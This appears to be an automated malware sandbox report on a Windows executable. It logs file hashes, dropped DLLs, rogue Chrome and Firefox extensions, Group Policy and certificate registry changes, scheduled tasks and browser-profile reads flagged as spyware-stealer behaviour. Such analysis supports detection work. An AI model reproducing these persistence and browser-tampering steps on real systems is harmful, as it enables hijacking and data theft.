SHA256 7c3415f11576e09a0910da101422f044162b11607aa670452843436925d8c26b
SHA512 05d9e81255dfbd647198b4f9d13c420f3f8d56a235ebbec301d7006597bec72b4bfa0dc7e8e1f76de4e9d16b5e95a9f5c585bbdb4ce5fe98cade2872dffccf3a

memory/1480-491-0x00000000037E0000-0x000000000386A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f97d9gc7.default-release\prefs.js

MD5 d9a698298df9396c239d3af6d9f0d12c
SHA1 72e67e26785adecfd4d49bad40a5f47b0ba13a46
SHA256 33a5c704ffbe3308bfb04688e95ee971560b62f2944cbf1717ce09b952e0db25
SHA512 c67d57646e629de25a24876b24f842ccb4e548349f5e67a8a23822a30c3caf6e9f0304f1d72f51e67b2725a85d70930f4f2113e302c93257769f62ab01c2debb

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 b750517d9a8a819c31e5fae1497be7f5
SHA1 a6943ce44dadf7cc84f7982ebe0b320b8b39e3ca
SHA256 8f1ac4af8bea6c885ea471794a7ff15c22337002de0c771cb46a01cdb4900394
SHA512 38a1a5479420ca4c76dd5e515f166d4a97c271b57977ded7d1fa1a3d4a58528a1ea4c8dea45b2d19b766fc72694f0eb5fada362f106ee984a4b7bc24ff0f0c36

memory/2096-501-0x00000000012C0000-0x00000000018A8000-memory.dmp

memory/1480-509-0x00000000039C0000-0x0000000003A95000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 8c70623a41f13f4b3f5ff4b935f637fe
SHA1 c6d94c98bb31a26dfc5f3ec6aa6adf7367603fa8
SHA256 3dfa2e4ca61f08ec3b936a0885637bec8ca34ea6ba913ef0ca686c900c8e46d6
SHA512 fe7b716776e98882749e2d59733d029addef041da8095f6ff458af9d6d962139ac4329af1dcae69197a4d2492aed128b4c98978ada5b80bf5cbd2d805466c84c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 d4f2005deb3396f5e0fadef016bdf38f
SHA1 fa9d7a186313aaa52f81301972789f4f977aa70d
SHA256 92a36ad675bf3d09851e35792033d08c5aaac355bf47b7d61a4bf13e448120b8
SHA512 ccf0ac4b2b53b75af699fd6c67fdc698f0bb58b158f20b2d35154bf664ca8c1b7f2fc12c385fdd486faa8ab09bd898c176a0ef141037aacb3ff28213a09d07f4

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-03 10:41

Reported

2024-04-03 10:44

Platform

win11-20240221-en

Max time kernel

144s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\ZyxyzYS.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\ZyxyzYS.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\LCifMpYymZWU2\tWWCHdy.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File created C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\ftzROSO.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File created C:\Program Files (x86)\mVqQIGUXDOgrC\rcwryes.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File created C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\FSRHEKC.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File created C:\Program Files (x86)\yvWovCiVU\LRNvgVr.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File created C:\Program Files (x86)\LCifMpYymZWU2\zYjinbqzvXXzX.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File created C:\Program Files (x86)\mVqQIGUXDOgrC\txXOAHH.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File created C:\Program Files (x86)\yvWovCiVU\YibzXz.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
File created C:\Program Files (x86)\gbPxNkbXHfUn\RiCqWut.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bCAdHbOFiqtMCRhbmR.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\ZJggANjsYpCqsGjEe.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\eGwAoTnpAObQfPU.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\kkPqOHrufYpxTagPJ.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{8465b6cf-0000-0000-0000-d01200000000}\NukeOnDelete = "0" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{8465b6cf-0000-0000-0000-d01200000000}\MaxCapacity = "14116" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "3" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
